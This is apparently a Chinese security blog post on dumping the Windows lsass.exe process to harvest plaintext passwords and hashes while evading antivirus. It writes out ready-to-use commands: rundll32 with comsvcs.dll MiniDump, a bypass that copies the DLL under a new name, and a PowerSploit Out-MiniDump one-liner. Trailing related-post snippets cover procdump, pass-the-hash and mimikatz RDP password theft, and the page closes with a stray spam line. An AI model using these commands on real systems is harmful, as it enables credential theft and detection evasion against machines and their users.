<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    免殺轉儲lsass進程技巧

    VSole2021-12-02 05:58:04

    在滲透測試中,最常用的方法是通過dump進程lsass.exe,從中獲得明文口令和hash,今天分享兩個免殺轉儲lsass方式,目前親測可過某60 or 某絨。

    第一種:

    comsvcs.dll,系統自帶。

    在原理上都是使用API MiniDumpWriteDump,通過comsvcs.dll的導出函數MiniDump實現dump內存。

    BOOL MiniDumpWriteDump(  HANDLE                            hProcess,  DWORD                             ProcessId,  HANDLE                            hFile,  MINIDUMP_TYPE                     DumpType,  PMINIDUMP_EXCEPTION_INFORMATION   ExceptionParam,  PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,  PMINIDUMP_CALLBACK_INFORMATION    CallbackParam);
    

    注意權限的問題:

    在dump指定進程內存文件時,需要開啟SeDebugPrivilege權限。管理員權限的cmd下,默認支持SeDebugPrivilege權限,但是狀態為Disabled禁用狀態。

    這里直接在cmd下執行rundll32的命令嘗試dump指定進程內存文件時,由于無法開啟SeDebugPrivilege權限,所以會失敗。

    解決方式:

    管理員權限的powershell下,默認支持SeDebugPrivilege權限,并且狀態為Enabled

    可以通過powershell執行rundll32的命令實現。

    首先查看lsass.exe進程PID:

     

    命令格式:

    rundll32.exe comsvcs.dll MiniDump <lsass PID> <out path> full
    

    直接利用發現會被攔截:

    rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 564 lsass.dmp full
    

    簡單的繞過思路:

    copy一下comsvcs.dll并命名為隨意名字,例如tubai.dll

    copy C:\windows\System32\comsvcs.dll tubai.dllrundll32.exe tubai.dll, MiniDump 564 lsass.dmp full
    

    如圖,成功轉儲了lsass

    第二種:

    PowerSploit 的一個模塊Out-MiniDump是一個基于 Powershell 的滲透工具包,可以選擇創建進程的完整內存轉儲。

    導入

    Import-Module Out-MiniDump
    

    執行

    Get-Process lsass | Out-Minidump
    

    總結:

    轉儲姿勢很多,應該一起向編寫一個程序來手動轉儲 LSASS 進程才是硬道理。

    免殺minidump
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    在滲透測試中,最常用的方法是通過dump進程lsass.exe,從中獲得明文口令和hash,今天分享兩個轉儲lsass方式,目前親測可過某60 or 某絨。在原理上都是使用API MiniDumpWriteDump,通過comsvcs.dll的導出函數MiniDump實現dump內存。
    繞過軟dump-Lsass內存
    2021-12-02 06:54:18
    dump lsass 進程是我們永遠都逃不過話題,除非微軟那天不用它保存憑據了,自然而然就不dump 它了,抓密碼是滲透重要的環節,是橫向擴展的基礎,接下來講講見到如何繞過軟dump lsass內存。
    所以可以通過它傳回lsass.dmp本地提取hashprocdump64.exe -accepteula -ma lsass.exe lsass.dmp 執行該指令,獲取到lsass.dmp
    所以可以通過它傳回lsass.dmp本地提取hashprocdump64.exe -accepteula -ma lsass.exe lsass.dmp 執行該指令,獲取到lsass.dmp
    如果找到了某個用戶的ntlm hash,就可以拿這個ntlm hash當作憑證進行遠程登陸了 其中若hash加密方式是 rc4 ,那么就是pass the hash 若加密方式是aes key,那么就是pass the key 注意NTLM和kerberos協議均存在PTH: NTLM自然不用多說 kerberos協議也是基于用戶的client hash開始一步步認證的,自然也會受PTH
    RDP憑證本機RDP密碼抓取本機RDP密碼是一個我們常遇到的場景,通常使用mimikatz抓取RDP密碼。當系統為win10或2012R2以上時,默認在內存緩存中禁止保存明文密碼,這時抓取的明文密碼為空。上不了線的情況下,也可以在webshell中來dump內存,保存到本地解密即可。
    0x00 前言這次滲透測試是從一個CVE開始的,從CVE到內網然后到域控!首先對發現了該站點有JBoss頁面,經過測試發現具有JBoss反序列化漏洞。使用網上提供的EXP和利用方法,在VPS上面獲取了一個shell。
    很多人把這個原因歸結于KB2871997補丁,實際上不然,這個事情的成因實際是UAC在搗亂。RID為500的賬戶和屬于本地administrators組的域用戶在通過網絡遠程鏈接時,默認就是高權限令牌。
    如果找到了某個用戶的ntlm hash,就可以拿這個ntlm hash當作憑證進行遠程登陸了 其中若hash加密方式是 rc4 ,那么就是pass the hash 若加密方式是aes key,那么就是pass the key 注意NTLM和kerberos協議均存在PTH: NTLM自然不用多說 kerberos協議也是基于用戶的client hash開始一步步認證的,自然也會受PTH
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类